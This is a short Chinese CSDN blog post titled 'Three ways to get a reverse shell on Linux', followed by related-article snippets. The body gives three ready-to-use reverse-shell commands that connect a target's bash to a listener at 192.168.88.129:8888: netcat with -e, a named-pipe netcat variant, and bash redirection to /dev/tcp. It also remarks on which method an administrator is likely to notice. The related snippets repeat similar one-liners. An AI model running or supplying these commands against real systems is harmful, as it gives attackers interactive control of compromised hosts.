Linux下反弹shell的三种方法

最新推荐文章于 2024-03-14 16:59:52 发布

zoushurong1

最新推荐文章于 2024-03-14 16:59:52 发布

阅读量3.4k

点赞数

分类专栏： TCP IP linux shell 文章标签： linux shell netcat 管道

本文链接：https://blog.csdn.net/zoushurong1/article/details/77946958

版权

TCP 同时被 3 个专栏收录

5 篇文章 0 订阅

订阅专栏

5 篇文章 0 订阅

订阅专栏

linux

3 篇文章 0 订阅

订阅专栏

Linux下反弹shell的三种方法

1.直接使用nc

nc 192.168.88.129（监听IP） 8888（监听Port） -e /bin/bash

适用目标系统nc命令没有禁用 -e参数

2.使用nc与管道

mknod backpipe p; nc 192.168.88.129（监听IP） 8888（监听Port） 0<backpipe | /bin/bash 1>backpipe 2>backpipe

使用管道符 | 连接nc的输出与bash的输入，使用自己创建的管道 backpipe连接/bin/bash的输出与nc的输入。优点：适用于nc的 -e参数被禁。缺点：会在当前目录下创建一个名为backpipe的管道文件,容易被管理员发现。

3.直接使用bash命令

bash -i >& /dev/tcp/192.168.88.129/8888 0>&1

使用 >& 把bash的错误也重定向至tcp连接的输入

优惠劵

zoushurong1

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
Linux下反弹shell的三种方法

Linux下反弹shell的三种方法
复制链接

扫一扫

专栏目录

内网渗透-常用反弹shell方法总结

lza20001103的博客

08-28

4502

常用反弹shell方法总结文章目录常用反弹shell方法总结前言bash反弹shellnc反弹shell1.nc弹linux的shell: nc -e /bin/bash 1.1.1.1 99992. 如果linux中nc没有-e参数3.nc 弹windows下的shell:whois 反弹shell常见脚本反弹1.python2.phppowercat反弹shellmsf反弹shell 前言 bash反弹shell bash -i >&/dev/tcp/1.1.1.1/9999 0&gt

Linux下NC反弹shell命令（推荐）

09-15

主要介绍了Linux下NC反弹shell命令，非常不错，具有参考借鉴价值，需要的的朋友参考下吧

参与评论您还未登录，请先登录后发表或查看评论

【转】反弹Shell，看这一篇就够了

最新发布

2301_79015613的博客

03-14

729

简介：nc瑞士军刀，通常被称为netcat或简称nc，是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据，具有多种强大的功能，使用也相对简单，只需两台装有nc的PC，就可以进行各种网络操作。例如，通过监听特定端口，可以实现电子取证PC与电子取证设备之间的通信和数据同步。下面是nc的常用参数。

Linux下反弹shell

04-21

4078

在渗透过程中，目标处于内网环境，或因为端口限制而我们无法直连目标机器，此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell，以便继续深入。记录几个常用的。

linux反弹shell方法

weixin_53747497的博客

07-12

1641

被控端主动发起连接请求去连接控制端，通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i ：打开一个交互式的bash shell/dev/tcp/IP/PORT ： /dev/tcp/是Linux中的一个特殊设备文件（Linux一切皆文件），实际这个文件是不存在的，它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出，为了确保命令执行后的输入被正确的传回攻击机。

LINUX shell反弹篇（一）

胖虎的博客

10-26

2038

linux 之shell反弹的方法及原理

【安全知识】——LInux的shell反弹姿势合集（更新中）

Demo不是emo的博客

05-17

5495

当我们拿到一台LINUX主机的权限时，往往都需要反弹到公网的服务器上，一般我们使用bash来反弹的情况居多，但是bash也有失灵的时候。在这种情况下，我们可以尝试使用其他的反弹语句来达到我们的目的。

linux反弹shell的原理详解

01-08

反弹shell命令： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell： nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...

浅析Linux之bash反弹shell原理

01-08

反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作，原因有很多，例如目标是局域网，或者开启防火墙的某些策略等情况，而这时，我们就可以让受害者主动向攻击者发起连接，被控端发起请求到控制端某端口...

浅谈反弹shell

weixin_53284312的博客

01-12

2174

反弹shell

Linux 反弹 Shell

sankgao 的博客

01-12

532

Linux 反弹 Shell

渗透测试-Linux反弹shell

lza20001103的博客

05-11

2884

Linux反弹shell

反弹shell汇总（超详细）

qq_52173020的博客

05-27

4552

别怕失败.

常用反弹 shell 方式总结

未完成的歌~的博客

03-07

4607

反弹shell，就是攻击机监听在某个TCP/UDP端口为服务端，目标机主动发起请求到攻击机监听的端口，并将其命令行的输入输出转到攻击机。

Linux反弹shell

weixin_64338385的博客

11-26

2253

0x01. bash 反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。在攻击主机上执行端口监听： nc -lvvp port //port 为攻击主机端口在目标主机上执行： bash -i >& /dev/tcp/攻击主机i...

容器内反弹shell的51种姿势

帮助别人等于帮助自己 ——MXi4oyu

11-19

1219

什么是反弹shell？反弹shell（reverse shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell？通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例：假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向

Linux常用的反弹shell命令

m0_63200360的博客

04-24

2170

WEB安全基础 - - -Linux反弹shell

weixin_67503304的博客

08-23

2805

详细讲解Linux反弹shell包含的NC正向shell，NC反向shell，bash反弹shell，无e参数反弹shell，Base64编码绕过，Telnet反弹shell，OpenSSL反弹443端口，流量加密传输

linux、反弹shell

09-03

Linux反弹Shell是一种通过建立网络连接，将受攻击计算机的Shell会话连接到攻击者的计算机上的技术。这种技术通常用于渗透测试或者恶意攻击。在Linux上，可以使用多种方法来实现反弹Shell。以下是其中一种常见的...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交